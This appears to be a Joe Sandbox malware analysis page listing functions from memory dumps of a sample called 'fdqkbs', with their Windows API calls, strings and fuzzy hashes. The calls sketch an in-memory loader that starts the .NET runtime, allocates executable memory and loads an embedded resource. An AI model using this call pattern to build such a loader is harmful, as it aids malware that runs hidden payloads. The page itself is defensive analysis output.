Instruction ID: e5bbcf8570dedd721561150fbe93f273e631184976035fe4b26c3be348694e41
Opcode Fuzzy Hash: 77243af43771274cdb188aef89358dc4b6a46996269f3f5b9eca3cf8be097b49
Instruction Fuzzy Hash: A3B14A75A012199FCB01CFA4C988EAEBBB9BF48754B14446EE905FB360DB35DD01CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00400FCA Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 293
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CLRCreateInstance.MSCOREE(00412D78,00412D38,?), ref: 00401037

Strings

v4.0.30319, xrefs: 00401053

Memory Dump Source

Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd

Yara matches

Similarity

API ID: CreateInstance
String ID: v4.0.30319
API String ID: 542301482-3152434051
Opcode ID: d5844462e1a5dd029352ded2376a126f08e6edf1cdd364a8f2b9e562c4d8b20e
Instruction ID: f08f0f033d3d63231fbdb02c94349a7a69f50f577d8668260f178b61efdc381d
Opcode Fuzzy Hash: d5844462e1a5dd029352ded2376a126f08e6edf1cdd364a8f2b9e562c4d8b20e
Instruction Fuzzy Hash: E2B12B75A012199FDB01CFA4C988EAEBBB9BF88750B14446EE905FB3A0DB35DD01CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00400FE9 Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 291
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CLRCreateInstance.MSCOREE(00412D78,00412D38,?), ref: 00401037
SafeArrayCreate.OLEAUT32(00000011,00000001,?), ref: 00401121
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00401139
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 0040115B
GetCommandLineW.KERNEL32(?), ref: 004011EE
CommandLineToArgvW.SHELL32(00000000), ref: 004011F5
SafeArrayCreateVector.OLEAUT32(00000008,00000000,?), ref: 00401204
SysAllocString.OLEAUT32(?), ref: 00401226
SafeArrayPutElement.OLEAUT32(00000000,?,00000000), ref: 00401232
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 0040124F
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 00401270
SafeArrayDestroy.OLEAUT32(?), ref: 004012B8
SafeArrayDestroy.OLEAUT32(00000000), ref: 004012C3
SafeArrayCreate.OLEAUT32(0000000C,00000001,?), ref: 00401312
CoInitialize.OLE32(00000000), ref: 00401322
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00401344
VariantInit.OLEAUT32(?), ref: 0040140D
VariantInit.OLEAUT32(?), ref: 00401416
VariantClear.OLEAUT32(?), ref: 00401438
VariantClear.OLEAUT32(?), ref: 0040144A
VariantClear.OLEAUT32(?), ref: 00401453
GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040148E
FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 00401491
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014A0
LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014A3
LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014B0
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014BC
SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014BF
FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014D8
ExitProcess.KERNEL32 ref: 004014E0

Strings

v4.0.30319, xrefs: 00401053

Memory Dump Source

Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd

Yara matches

Similarity

API ID: ArraySafe$CreateResourceVariant$ClearHandleModule$AllocCommandDataDestroyElementInitLineVector$AccessArgvExitFindFreeInitializeInstanceLoadLockProcessSizeofStringUnaccessVirtual
String ID: v4.0.30319
API String ID: 3516860096-3152434051
Opcode ID: 873238705ce47a69c6e2e929523a932b8a4326f398e40a407d6947fa5b2cd078
Instruction ID: 0c2c29d2e87145e6a018a0f42715e838ea3eb340154ddaa220d5c303f6f6ea5b
Opcode Fuzzy Hash: 873238705ce47a69c6e2e929523a932b8a4326f398e40a407d6947fa5b2cd078
Instruction Fuzzy Hash: B2B12975A012199FCB01CFA4C988EAEBBB9BF88750B14446EE905FB360DB35DD01CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00400FAE Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 287
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CLRCreateInstance.MSCOREE(00412D78,00412D38,?), ref: 00401037

Strings

v4.0.30319, xrefs: 00401053

Memory Dump Source

Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd

Yara matches

Similarity

API ID: CreateInstance
String ID: v4.0.30319
API String ID: 542301482-3152434051
Opcode ID: 85fe1cc5f0066b84895c07e484125a00651d0d94523f1ac9f254cc520d16adbb
Instruction ID: c628a7e1a31fe17d332532bab36448b76cf9220d3634fe75d1a8a10d87e09ff7
Opcode Fuzzy Hash: 85fe1cc5f0066b84895c07e484125a00651d0d94523f1ac9f254cc520d16adbb
Instruction Fuzzy Hash: 9BB13B75A012199FCB01CFA4C988DAEBBB9BF88750B14446EE905FB360DB35DD41CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00400FD8 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 271
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SafeArrayCreate.OLEAUT32(00000011,00000001,?), ref: 00401121
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00401139
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 0040115B

Strings

v4.0.30319, xrefs: 00401053

Memory Dump Source

Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd

Yara matches

Similarity

API ID: ArraySafe$Data$AccessCreateUnaccess
String ID: v4.0.30319
API String ID: 3631458715-3152434051
Opcode ID: 02245fa6a25c8a7a88b4d047e5ae443a1f903a675161b50fceca8856171a95dd
Instruction ID: 2316b79ef1876d233a0ca10ce79880e8c0426e1a516b816bc189b1ee0b53c2a9
Opcode Fuzzy Hash: 02245fa6a25c8a7a88b4d047e5ae443a1f903a675161b50fceca8856171a95dd
Instruction Fuzzy Hash: E6A14B75A002199FCB11CFA4C888EAEBBB9AF48750B14046DE905FB3A1DB35ED01CB54

Uniqueness

Uniqueness Score: -1.00%

Function 022CB6C0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 123
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 022CB730
GetCurrentThread.KERNEL32 ref: 022CB76D
GetCurrentProcess.KERNEL32 ref: 022CB7AA
GetCurrentThreadId.KERNEL32 ref: 022CB803

Strings

LR;v, xrefs: 022CB6EC

Memory Dump Source

Source File: 00000003.00000002.290890793.00000000022C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22c0000_fdqkbs.jbxd

Similarity

API ID: Current$ProcessThread
String ID: LR;v
API String ID: 2063062207-443218294
Opcode ID: d125feb8206142147b7e8e79a0803a726c69ce17f8ddb32781dc54dfe58c612c
Instruction ID: de6f3c8e3d44bbc186aa59f595a8442587f8d703395b005e86ab6b0a2ffe8823
Opcode Fuzzy Hash: d125feb8206142147b7e8e79a0803a726c69ce17f8ddb32781dc54dfe58c612c
Instruction Fuzzy Hash: E05156B49042498FDB10CFAAC5887DEBBF1EF48314F24856AE419B7391D7786884CF65

Uniqueness

Uniqueness Score: -1.00%

Function 022CB6D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 022CB730
GetCurrentThread.KERNEL32 ref: 022CB76D
GetCurrentProcess.KERNEL32 ref: 022CB7AA
GetCurrentThreadId.KERNEL32 ref: 022CB803

Strings

LR;v, xrefs: 022CB6EC

Memory Dump Source

Source File: 00000003.00000002.290890793.00000000022C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22c0000_fdqkbs.jbxd

Similarity

API ID: Current$ProcessThread
String ID: LR;v
API String ID: 2063062207-443218294
Opcode ID: c68dd2bd4b610fd48ef6be52b73724fd4fe4f83edeaf9ce201a1bdb8769dc55f
Instruction ID: 15335aaa2b29c0bbf7a360c9785e3ab16f980a907db78f2791d227c73bb65b8c
Opcode Fuzzy Hash: c68dd2bd4b610fd48ef6be52b73724fd4fe4f83edeaf9ce201a1bdb8769dc55f
Instruction Fuzzy Hash: BD5114B09002498FDB14CFAAD588BDEBBF5EB48314F248569E419B7350D7786884CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0044D450 Relevance: 7.7, APIs: 5, Instructions: 185
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?), ref: 0044D592
GetProcAddress.KERNEL32(?,00449FF9), ref: 0044D5B0
ExitProcess.KERNEL32(?,00449FF9), ref: 0044D5C1
VirtualProtect.KERNELBASE(00400000,00001000,00000004,?,-00000060), ref: 0044D5DE
VirtualProtect.KERNELBASE(00400000,00001000), ref: 0044D5F3

Memory Dump Source

Source File: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
String ID:
API String ID: 1996367037-0
Opcode ID: 95c73a4e7170ffa8ba6ab080427cec7b3bfbced1036f2afbc60761617324cedf
Instruction ID: 0ac0b7c0e5739bb1137c923d74207649c3e0b311112d00f109e80ec51aefa481
Opcode Fuzzy Hash: 95c73a4e7170ffa8ba6ab080427cec7b3bfbced1036f2afbc60761617324cedf
Instruction Fuzzy Hash: 32512BB1E447125BE7205DB89CC06B577A4DB52338B18073BC5E2C73C5EBBC680A8769

Uniqueness

Uniqueness Score: -1.00%

Function 022CFBEE Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 022CFD0A

Strings

LR;v, xrefs: 022CFC26
LR;v, xrefs: 022CFC46

Memory Dump Source

Source File: 00000003.00000002.290890793.00000000022C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22c0000_fdqkbs.jbxd

Similarity

API ID: CreateWindow
String ID: LR;v$LR;v
API String ID: 716092398-2984026332
Opcode ID: c954caf30cebec69dbcc88bc72ba00e6f3235b9eaf6cdb4c7850e4905d4285d8
Instruction ID: 2750093f50154a075495d3c3018d870866cce9be6c967c60ba1b64060c94f5a4
Opcode Fuzzy Hash: c954caf30cebec69dbcc88bc72ba00e6f3235b9eaf6cdb4c7850e4905d4285d8
Instruction Fuzzy Hash: 1251C1B1D10209DFDB14CF9AD980ADEBBB2FF48310F24822AE819AB214D7749945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 022CFBF8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 022CFD0A

Strings

LR;v, xrefs: 022CFC26
LR;v, xrefs: 022CFC46

Memory Dump Source

Source File: 00000003.00000002.290890793.00000000022C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22c0000_fdqkbs.jbxd

Similarity

API ID: CreateWindow
String ID: LR;v$LR;v
API String ID: 716092398-2984026332
Opcode ID: fdf1918d33eea9096b1dbc528231f8ce968229ec688064b6f7557715fd2f587e
Instruction ID: 5e1e6b466459b419971ba34bef764e8372e644cf908106831bdf4779d21f84d3
Opcode Fuzzy Hash: fdf1918d33eea9096b1dbc528231f8ce968229ec688064b6f7557715fd2f587e
Instruction Fuzzy Hash: 6C41C2B1D10209DFDB14CFDAC980ADEBBB6BF48310F24822AE819AB214D7749945CF94

Uniqueness

Uniqueness Score: -1.00%

Function 050717E0 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 517COMMON

Download Yara Rule

Strings

LR;v, xrefs: 050717F7

Memory Dump Source

Source File: 00000003.00000002.292866903.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5070000_fdqkbs.jbxd

Similarity

API ID:
String ID: LR;v
API String ID: 0-443218294
Opcode ID: 57cc827748cc429c13dda1e0dd190618e74573d3423c2f809dddeefa0036b9eb
Instruction ID: 930484ffc6624e1aa9b76acbe4c0d4b3cfdbb96f8aa6ba4b0b5b3c90cbb93654
Opcode Fuzzy Hash: 57cc827748cc429c13dda1e0dd190618e74573d3423c2f809dddeefa0036b9eb
Instruction Fuzzy Hash: 26226478E0420ECFCB54DB94E4899BEBBB2FF89310F248555D51267395C734E882CB69

Uniqueness

Uniqueness Score: -1.00%

Function 022C93E8 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 196
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 022C962E

Strings

LR;v, xrefs: 022C95E7

Memory Dump Source

Source File: 00000003.00000002.290890793.00000000022C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22c0000_fdqkbs.jbxd

Similarity

API ID: HandleModule
String ID: LR;v
API String ID: 4139908857-443218294
Opcode ID: 1638d5769a369bfd53f1655072ab9ae06999cda3d5b4bf4b956a538ec874e1f0
Instruction ID: 402f7b45f27d9d5a2a9cc5fb2fad72389fa3aa0ea5bef39d2669b1932d2d8d21
Opcode Fuzzy Hash: 1638d5769a369bfd53f1655072ab9ae06999cda3d5b4bf4b956a538ec874e1f0
Instruction Fuzzy Hash: 7A712470A10B058FD724DF6AD4447AABBF5BF88304F208A2ED48AD7A44DB74E945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 050745F5 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 124
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 050746B1

Strings

LR;v, xrefs: 05074634

Memory Dump Source

Source File: 00000003.00000002.292866903.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5070000_fdqkbs.jbxd

Similarity

API ID: Create
String ID: LR;v
API String ID: 2289755597-443218294
Opcode ID: 4560ad237878ee8698ab10682faaf8db32147f7a0268a2766455ac31ff590994
Instruction ID: 43a8b15253d7cdef4bab88df8f8aa3911c5cd88680b897601bd2b6c8fa182464
Opcode Fuzzy Hash: 4560ad237878ee8698ab10682faaf8db32147f7a0268a2766455ac31ff590994
Instruction Fuzzy Hash: 5351F3B1C00659CFDB20CFAAD8847DEBBF5BF88304F208059D409AB251D7B5A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05073474 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 050746B1

Strings

LR;v, xrefs: 05074634

Memory Dump Source

Source File: 00000003.00000002.292866903.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5070000_fdqkbs.jbxd

Similarity

API ID: Create
String ID: LR;v
API String ID: 2289755597-443218294
Opcode ID: ce0ea00ea04fbe0b6335f5da50bee3fdacf962f6be428bb3a55373f0463715b1
Instruction ID: 622829baf36702d343c4074f845f4780f2f2dc4c7630a4d5d948634a6aa399af
Opcode Fuzzy Hash: ce0ea00ea04fbe0b6335f5da50bee3fdacf962f6be428bb3a55373f0463715b1
Instruction Fuzzy Hash: 0441E0B1C0065CCBDB24CFAAC844B9EBBF5BF89304F20806AD409BB251D7756945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 05072470 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 05072531

Strings

LR;v, xrefs: 05072487

Memory Dump Source

Source File: 00000003.00000002.292866903.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5070000_fdqkbs.jbxd

Similarity

API ID: CallProcWindow
String ID: LR;v
API String ID: 2714655100-443218294
Opcode ID: 4a760a89e91d2fc3bede3ded8e0ae357eb8e4c75a04f12ee66e08300d70100a4
Instruction ID: 2804aa5ab5799bba99520503201a19417d3f4fce79a05ccb34f7afbe1f2befb4
Opcode Fuzzy Hash: 4a760a89e91d2fc3bede3ded8e0ae357eb8e4c75a04f12ee66e08300d70100a4
Instruction Fuzzy Hash: D741F7B9D003098FDB14CF9AD448AAEBBF6FB88314F25C459D519AB321D374A841CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0507B889 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 0507B957

Strings

LR;v, xrefs: 0507B902

Memory Dump Source

Source File: 00000003.00000002.292866903.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5070000_fdqkbs.jbxd

Similarity

API ID: CreateFromIconResource
String ID: LR;v
API String ID: 3668623891-443218294
Opcode ID: 068d8f5e46823bccc68ef629bc0f42f9db56915c942e552b17cb60be97b31d66
Instruction ID: 5ddbee76609f7f93757f30a18c71c3e44f8a7ec3ae74445b279c941a69d52ede
Opcode Fuzzy Hash: 068d8f5e46823bccc68ef629bc0f42f9db56915c942e552b17cb60be97b31d66
Instruction Fuzzy Hash: EC31CB72904348AFDB118FAAD800ADEBFF9EF09310F04805AE954A7221C3399850DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 022CBCF8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 022CBD87

Strings

LR;v, xrefs: 022CBD1F

Memory Dump Source

Source File: 00000003.00000002.290890793.00000000022C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22c0000_fdqkbs.jbxd

Similarity

API ID: DuplicateHandle
String ID: LR;v
API String ID: 3793708945-443218294
Opcode ID: a97db087bfaf19e0584a4e8358d1f99525a9f54c4b177ade0abde033b218fc80
Instruction ID: bca6c5683d706f2df176148645934932fe72f7088e16c63cbf7c12cd68989b94
Opcode Fuzzy Hash: a97db087bfaf19e0584a4e8358d1f99525a9f54c4b177ade0abde033b218fc80
Instruction Fuzzy Hash: E421D2B5D00219DFDB00CFAAD580ADEBBF5AF48314F24845AE858B7350D378A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 022CBD00 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 022CBD87

Strings

LR;v, xrefs: 022CBD1F

Memory Dump Source

Source File: 00000003.00000002.290890793.00000000022C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22c0000_fdqkbs.jbxd

Similarity

API ID: DuplicateHandle
String ID: LR;v
API String ID: 3793708945-443218294
Opcode ID: ddf9afb34853ef34be14f64c978fa67a9842d230ebb7f9fe366370c4b21f7749
Instruction ID: 8f2ba4c74a1ecac00ab2b4ffbad3eaa920ea21c9ea52bb9b88cbe0a4d41de76a
Opcode Fuzzy Hash: ddf9afb34853ef34be14f64c978fa67a9842d230ebb7f9fe366370c4b21f7749
Instruction Fuzzy Hash: 5221E5B59002089FDB10CF9AD484ADEBBF5EB48314F14801AE918B3310D378A944CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 022C7EEA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(0000004B), ref: 022C7F5D

Strings

LR;v, xrefs: 022C7F0F

Memory Dump Source

Source File: 00000003.00000002.290890793.00000000022C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22c0000_fdqkbs.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID: LR;v
API String ID: 2492992576-443218294
Opcode ID: becd376db111e51dd28bc4e702ae0aa9e7a99d884ca47acee649dad781d235b4
Instruction ID: 06b4076421bfaa6a64d557def5572e6d8cd78164db4a608d87ec114165e2a3fa
Opcode Fuzzy Hash: becd376db111e51dd28bc4e702ae0aa9e7a99d884ca47acee649dad781d235b4
Instruction Fuzzy Hash: B7218C718043998FDB11CFA9D4443DABFF8EB05314F54846AD494B7682C7789645CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 022C8768 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,022C96A9,00000800,00000000,00000000), ref: 022C98BA

Strings

LR;v, xrefs: 022C986F

Memory Dump Source

Source File: 00000003.00000002.290890793.00000000022C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22c0000_fdqkbs.jbxd

Similarity

API ID: LibraryLoad
String ID: LR;v
API String ID: 1029625771-443218294
Opcode ID: 376b0b46101a4cefc28d9ab6c26a3527046b44b9ac16bf57541fbcd51cbfbfbb
Instruction ID: 760efb53303669edea4ca533c063497534770e630d1c0c57430d30d658b271c7
Opcode Fuzzy Hash: 376b0b46101a4cefc28d9ab6c26a3527046b44b9ac16bf57541fbcd51cbfbfbb
Instruction Fuzzy Hash: C511F4B69042098FDB10CF9AC444AEEBBF5AB48314F50856EE919B7700C379A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 022C9849 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,022C96A9,00000800,00000000,00000000), ref: 022C98BA

Strings

LR;v, xrefs: 022C986F

Memory Dump Source

Source File: 00000003.00000002.290890793.00000000022C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22c0000_fdqkbs.jbxd

Similarity

API ID: LibraryLoad
String ID: LR;v
API String ID: 1029625771-443218294
Opcode ID: 66bcd7cca648663c14a630ea02f6907c2cdd2f3a37f8952cd298f3b42133f5e8
Instruction ID: 37580d182743b4df8519c474d48aba95ee44fd0032fb305719db79787615b674
Opcode Fuzzy Hash: 66bcd7cca648663c14a630ea02f6907c2cdd2f3a37f8952cd298f3b42133f5e8
Instruction Fuzzy Hash: F21103B6D042098FDB10CF9AC884AEEBBF5AB88314F24856ED419B7710C378A545CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0507B8E8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 0507B957

Strings

LR;v, xrefs: 0507B902

Memory Dump Source

Source File: 00000003.00000002.292866903.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5070000_fdqkbs.jbxd

Similarity

API ID: CreateFromIconResource
String ID: LR;v
API String ID: 3668623891-443218294
Opcode ID: 113e57f1b73b77763d7ac321973c869820ed799f16e6f414f505bfa10b5a68eb
Instruction ID: a764d684232138ae436987f51ccdab690201002374b8f08f91b39d1263bb009e
Opcode Fuzzy Hash: 113e57f1b73b77763d7ac321973c869820ed799f16e6f414f505bfa10b5a68eb
Instruction Fuzzy Hash: B51126B18002499FDB10CFAAD844BDEBFF8EF48320F14841AE964B7210C379A954DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 050732D8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 51windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,021953E8,00000000,?), ref: 0507E73D

Strings

LR;v, xrefs: 0507E6FA

Memory Dump Source

Source File: 00000003.00000002.292866903.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5070000_fdqkbs.jbxd

Similarity

API ID: MessagePost
String ID: LR;v
API String ID: 410705778-443218294
Opcode ID: 1508b912a2a6b9a54acf17c2c58068504b8f3a06549e48908aa71b32b409e4c2
Instruction ID: bcb888c8e3a4313dda3769605f49dba20ffd796ddc916de935a921e1ced603c8
Opcode Fuzzy Hash: 1508b912a2a6b9a54acf17c2c58068504b8f3a06549e48908aa71b32b409e4c2
Instruction Fuzzy Hash: BE1116B5800249DFDB10CF9AD845BEEBBF8EB48324F20846AE554A3341D378A944CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0507E6D8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,021953E8,00000000,?), ref: 0507E73D

Strings

LR;v, xrefs: 0507E6FA

Memory Dump Source

Source File: 00000003.00000002.292866903.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5070000_fdqkbs.jbxd

Similarity

API ID: MessagePost
String ID: LR;v
API String ID: 410705778-443218294
Opcode ID: d541503d777ea5e5d866db7819a1486daf99bd13047eb637ce5b56027f6ee3ae
Instruction ID: ae044317824e0924d67a640e10805de4c84d4872819b86389c374c2632de70f1
Opcode Fuzzy Hash: d541503d777ea5e5d866db7819a1486daf99bd13047eb637ce5b56027f6ee3ae
Instruction Fuzzy Hash: E81149718002499FDB10CF9AD844BDEBFF8EB48310F20845AE454A3201D378A954CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 05071540 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,0000020A,?,00000000,?,?,?,?,0507226A,?,00000000,?), ref: 0507C435

Strings

LR;v, xrefs: 0507C3F2

Memory Dump Source

Source File: 00000003.00000002.292866903.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5070000_fdqkbs.jbxd

Similarity

API ID: MessageSend
String ID: LR;v
API String ID: 3850602802-443218294
Opcode ID: 4ae06ee0d7d80b98c800ab358b0e16fc3eeb35c53d80cf29215b0f34bc462661
Instruction ID: db99c25037b26dd072350fc564f75669c52bd3edae77a06f0e66d939885ffe93
Opcode Fuzzy Hash: 4ae06ee0d7d80b98c800ab358b0e16fc3eeb35c53d80cf29215b0f34bc462661
Instruction Fuzzy Hash: 3F11E3B58002489FDB10CF9AD844BEEBBF8FB48314F20841AE959B7700C374A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0507A548 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?,?,?,?,?,00000000), ref: 0507BCBD

Strings

LR;v, xrefs: 0507BC7A

Memory Dump Source

Source File: 00000003.00000002.292866903.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5070000_fdqkbs.jbxd

Similarity

API ID: MessageSend
String ID: LR;v
API String ID: 3850602802-443218294
Opcode ID: 89fc7aae42d4256126bf1b601a9f3451df245325df85e9b6be198a9795d68f73
